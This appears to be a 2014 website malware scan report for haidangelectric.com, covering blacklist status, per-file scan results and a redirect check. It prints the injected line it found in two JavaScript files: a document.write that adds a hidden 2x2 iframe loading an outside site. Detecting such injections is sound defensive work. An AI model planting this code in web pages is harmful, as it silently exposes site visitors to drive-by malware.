Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haidangelectric.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://haidangelectric.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haidangelectric.com/ | 200 OK Content-Length: 28540 Content-Type: text/html | clean |
http://haidangelectric.com/js/jQuery/1.5.2/jquery.min.js | 200 OK Content-Length: 86089 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c==="none"||c==="")c="block";b_[a]=c}return b_[a]}function ce(a,b){var c={};d.each(cd.concat.apply([],cd.slice(0,b)),function(){c[this]=a});return c}function b$(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function bZ(){try{return new a.XMLHttpRequest}catch(b){}}function bY(){d document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=230459 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459> | ||
http://download.skype.com/share/skypebuttons/js/skypeCheck.js | 200 OK Content-Length: 21434 Content-Type: application/x-javascript | clean |
http://haidangelectric.com/index.php?lang=en | 200 OK Content-Length: 5529 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?lang=vn | 200 OK Content-Length: 28540 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_contact | 200 OK Content-Length: 15232 Content-Type: text/html | clean |
http://haidangelectric.com/js/common.js | 200 OK Content-Length: 3714 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function IsNumeric(sText, sdot){
var ValidChars = "0123456789" + sdot; var IsNumber=true; var Char; var isDot = false; for (i = 0; i < sText.length && IsNumber == true; i++) { Char = sText.charAt(i); if (ValidChars.indexOf(Char) == -1 || (isDot && Char == sdot )) { IsNumber = false; } if(Char == sdot){ isDot = true; } } return IsNumber; } function trim(str } function IsEmail(value) { var email = document.getElementById('emailaddress'); var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!filter.test(value)) { return false; }else{ return true; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=230459 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=230459> | ||
http://haidangelectric.com/js/function.php | 200 OK Content-Length: 1024 Content-Type: text/html | clean |
http://haidangelectric.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_download | 200 OK Content-Length: 28912 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_contentlist&type=about | 200 OK Content-Length: 12450 Content-Type: text/html | clean |
http://haidangelectric.com/index.php | 200 OK Content-Length: 28540 Content-Type: text/html | clean |
http://haidangelectric.com/skype:letruong6?chat | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_product&cat=1&subcat=7 | 200 OK Content-Length: 27394 Content-Type: text/html | clean |
http://haidangelectric.com/index.php?option=com_product&cat=1&subcat=8 | 200 OK Content-Length: 12206 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haidangelectric.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 10:36:09 GMT
Pragma: no-cache
Server: nginx admin
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 27 Aug 2014 10:36:09 GMT
Set-Cookie: sessioncookie=e17b247a696be2c7f5a0e712bb78904f; expires=Wed, 27-Aug-2014 22:36:09 GMT; path=/
Set-Cookie: PHPSESSID=b2ad186f0a904d5f298ffe6c2bbe0591; path=/
X-Cache: HIT from Backend
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: haidangelectric.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 10:36:09 GMT
Pragma: no-cache
Server: nginx admin
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 27 Aug 2014 10:36:09 GMT
Set-Cookie: sessioncookie=e17b247a696be2c7f5a0e712bb78904f; expires=Wed, 27-Aug-2014 22:36:09 GMT; path=/
Set-Cookie: PHPSESSID=b2ad186f0a904d5f298ffe6c2bbe0591; path=/
X-Cache: HIT from Backend
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: haidangelectric.com
Referer: http://www.google.com/search?q=haidangelectric.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: haidangelectric.com
Referer: http://www.google.com/search?q=haidangelectric.com
Result:
The result is similar to the first query. There are no suspicious redirects found.